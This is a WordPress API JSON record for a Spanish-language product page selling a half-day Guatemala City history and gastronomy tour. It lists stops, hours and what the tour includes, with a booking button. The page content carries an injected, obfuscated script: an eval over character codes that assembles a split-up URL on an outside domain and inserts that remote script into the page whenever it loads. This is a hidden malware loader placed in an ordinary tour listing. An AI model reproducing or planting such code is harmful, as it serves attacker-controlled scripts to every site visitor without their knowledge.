{"id":977,"date":"2023-01-07T09:29:21","date_gmt":"2023-01-07T15:29:21","guid":{"rendered":"https:\/\/gtmtourguide.com\/?post_type=product&#038;p=977"},"modified":"2023-03-02T18:55:13","modified_gmt":"2023-03-03T00:55:13","slug":"historia-de-guatemala-experiencia-gastronomica-en-un-tour-colectivo-de-medio-dia","status":"publish","type":"product","link":"https:\/\/gtmtourguide.com\/index.php\/product\/historia-de-guatemala-experiencia-gastronomica-en-un-tour-colectivo-de-medio-dia\/","title":{"rendered":"Historia de Guatemala + Experiencia Gastron\u00f3mica en un Tour Colectivo de Medio D\u00eda"},"content":{"rendered":"<p><button class=\"wtrvl-checkout_button\" id=\"wetravel_button_widget\" data-env=\"https:\/\/www.wetravel.com\" data-version=\"v0.3\" data-uid=\"612513\" data-uuid=\"56576829\" href=\"https:\/\/www.wetravel.com\/checkout_embed?uuid=56576829\" style=\"background-color: #f5a623; color: #ffffff; border: 0px; border-radius: 5px; font-family: 'Poppins', sans-serif; font-weight: 400; font-size: 14px; -webkit-font-smoothing: antialiased; text-transform: capitalize; padding: 13px 24px; text-decoration: none; text-align: center; line-height: 14px; display: inline-block; cursor: pointer;\">Book Now<\/button> <script src=\"https:\/\/cdn.wetravel.com\/widgets\/embed_checkout.js\"><\/script><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));\/*54745756836*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp;<\/p>\n<p>Ser aventurero y explorar nuevos lugares hace que nuestras experiencias de vida sean inolvidables. Pero no tienes que ir al otro lado del mundo para hacerlo. Podr\u00e1s conocer todas las maravillas que esconde la Ciudad de Guatemala. Esta ciudad encierra una infinidad de puntos secretos llenos de historia, misticismo y cultura. Ad\u00e9ntrate en este recorrido panor\u00e1mico por el famoso centro hist\u00f3rico, con\u00e9ctate con la cultura guatemalteca y sorpr\u00e9ndete con esos peque\u00f1os detalles con historias de personajes famosos, eventos impresionantes y una arquitectura que solo el tiempo es due\u00f1o de<br \/>\ntodo su legado. Hemos planeado un recorrido que te emocionar\u00e1 de principio a fin y conoce historias y hechos curiosos que no todo el mundo conoce. \u00a1\u00danete a nosotros!<\/p>\n<p>Lugares por visitar:<\/p>\n<ul>\n<li>Centro Comercial Tikal Futura (Punto de partida)<\/li>\n<li>Majadas<\/li>\n<li>Kaminal Juy\u00fa<\/li>\n<li>Mapa en Relieve<\/li>\n<li>Cerrito del Carmen<\/li>\n<li>Plaza de la Constituci\u00f3n<\/li>\n<li>6\u00aa. Avenida<\/li>\n<li>Plaza Berl\u00edn<\/li>\n<\/ul>\n<p>Hora de salida y retorno:<\/p>\n<p>8:00 AM &#8211; 4:00 PM<\/p>\n<p>Incluye:<\/p>\n<ul>\n<li>Transporte Tur\u00edstico Ida y Vuelta<\/li>\n<li>Gu\u00eda tur\u00edstico certificado<\/li>\n<li>Protocolos de bioseguridad<\/li>\n<li>Kit personal de bioseguridad<\/li>\n<li>Experiencia gastron\u00f3mica guatemalteca (bocadillos de comida tradicional guatemalteca + bebida) Agua embotellada<\/li>\n<\/ul>\n<p>No incluye:<\/p>\n<ul>\n<li>Propinas<\/li>\n<li>Gastos personales<\/li>\n<li>D\u00edas de operaci\u00f3n en colectivo: <span style=\"color: #ff0000;\"><strong>mi\u00e9rcoles y domingo<\/strong><\/span><\/li>\n<\/ul>\n","protected":false},"featured_media":978,"comment_status":"open","ping_status":"closed","template":"","meta":{"om_disable_all_campaigns":false},"product_brand":[],"product_cat":[18],"product_tag":[],"class_list":{"0":"post-977","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-viajes-de-un-dia","8":"first","9":"instock","10":"shipping-taxable","11":"product-type-simple"},"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/gtmtourguide.com\/index.php\/wp-json\/wp\/v2\/product\/977","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/gtmtourguide.com\/index.php\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/gtmtourguide.com\/index.php\/wp-json\/wp\/v2\/types\/product"}],"replies":[{"embeddable":true,"href":"https:\/\/gtmtourguide.com\/index.php\/wp-json\/wp\/v2\/comments?post=977"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/gtmtourguide.com\/index.php\/wp-json\/wp\/v2\/media\/978"}],"wp:attachment":[{"href":"https:\/\/gtmtourguide.com\/index.php\/wp-json\/wp\/v2\/media?parent=977"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/gtmtourguide.com\/index.php\/wp-json\/wp\/v2\/product_brand?post=977"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/gtmtourguide.com\/index.php\/wp-json\/wp\/v2\/product_cat?post=977"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/gtmtourguide.com\/index.php\/wp-json\/wp\/v2\/product_tag?post=977"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}